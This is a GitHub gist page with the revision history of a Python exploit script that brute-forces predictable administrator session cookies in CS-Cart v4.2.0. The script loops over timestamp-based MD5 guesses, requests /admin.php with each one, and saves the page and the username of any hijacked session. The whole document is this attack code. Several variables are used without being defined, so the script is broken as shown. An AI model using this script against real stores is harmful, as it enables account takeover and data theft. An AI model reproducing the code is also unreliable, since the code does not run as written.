Skip to content

Instantly share code, notes, and snippets.

@rasismeiro
Forked from nikcub/cscart-exploit.py
Created November 21, 2016 14:30
Show Gist options
  • Save rasismeiro/0510960a99dfcd3358691314f3507c7b to your computer and use it in GitHub Desktop.
Save rasismeiro/0510960a99dfcd3358691314f3507c7b to your computer and use it in GitHub Desktop.

Revisions

  1. @nikcub nikcub revised this gist Aug 12, 2014. 1 changed file with 2 additions and 3 deletions.
    5 changes: 2 additions & 3 deletions cscart-exploit.py
    Original file line number Diff line number Diff line change
    @@ -1,7 +1,6 @@
    #!/usr/bin/env python
    # CS-Cart session brute force exploit
    # Nik Cubrilovic - www.nikcub.com
    # see blog post for explainer
    # CS-Cart session brute force exploit for v4.2.0
    # see https://www.nikcub.com/posts/cs-cart-v4-2-0-session-hijacking-and-other-vulnerabilities/

    import sys
    import requests
  2. @nikcub nikcub created this gist Jun 9, 2014.
    95 changes: 95 additions & 0 deletions cscart-exploit.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,95 @@
    #!/usr/bin/env python
    # CS-Cart session brute force exploit
    # Nik Cubrilovic - www.nikcub.com
    # see blog post for explainer

    import sys
    import requests
    import argparse
    import re
    import string
    import random
    import hashlib

    from BeautifulSoup import BeautifulSoup

    target_host = "cscart.dev"
    target_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:20.0) Gecko/20100101 Firefox/20.0"
    target_start_time = 1402325013 # timestamp seconds set to when link was clicked + 3-4 seconds for login.

    # change nothing below.

    session_name = False
    session_value = False
    cookies = {}


    headers = {
    "Host": target_host,
    "User-Agent": target_ua,
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate"
    }


    proxies = proxy_none
    req_base = 'http://' + host
    req_url = req_base + '/admin.php'

    def extract_username(html_doc):
    soup = BeautifulSoup(html_doc)
    menu = soup.find("ul", "dropdown-menu pull-right").find("li").find("a")
    if menu:
    return re.search(r'<br />(.*?)</a>', str(menu), re.DOTALL).group(1).strip()
    return 'Not Found'

    def rand_string(n=5):
    return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(n))

    def save_doc(tid, txt):
    f = open(tid + '_' + rand_string() + '.txt', 'w')
    f.write(txt.encode('ascii', 'ignore'))
    f.close()

    def req_att(path, cookie):
    cookies[session_name] = cookie
    r = requests.get(req_base + path, headers=headers, allow_redirects=False)

    def calc_session_name(host):
    return hashlib.md5(host).hexdigest()[:5]

    def gen_value(basetime, usec):
    return hashlib.md5("%s%08x%05x" % (basetime, basetime, usec)).hexdigest() + "_0_A"

    def req_generator(startat):
    usec = 0
    startat = startat
    while True:
    r = gen_value(startat, usec)
    usec += 1
    if (usec%10000) == 0:
    # print progress every 100000
    print '.'
    if usec >= 100000:
    usec = 0
    startat += 1
    yield r

    session_name = calc_session_name(req_base)

    def fetch(cookie):
    # cookies = {cookie_name, cookie}
    headers['Cookie'] = cookie_name + '=' + cookie
    try:
    response = requests.request('GET', req_url, headers=headers, proxies=proxies, timeout=30.0, allow_redirects=False)
    if response.status_code != 302:
    print "FOUND: " + session_name + "=" + session_guess
    save_doc(host + '_' + session_guess, "\n".join(r.headers) + "\n" + r.text)
    print "Wrote file backup"
    print "Signed in as: " + extract_username(r.text)
    except Exception, e:
    pass

    for url in req_generator(target_start_time):
    fetch(url)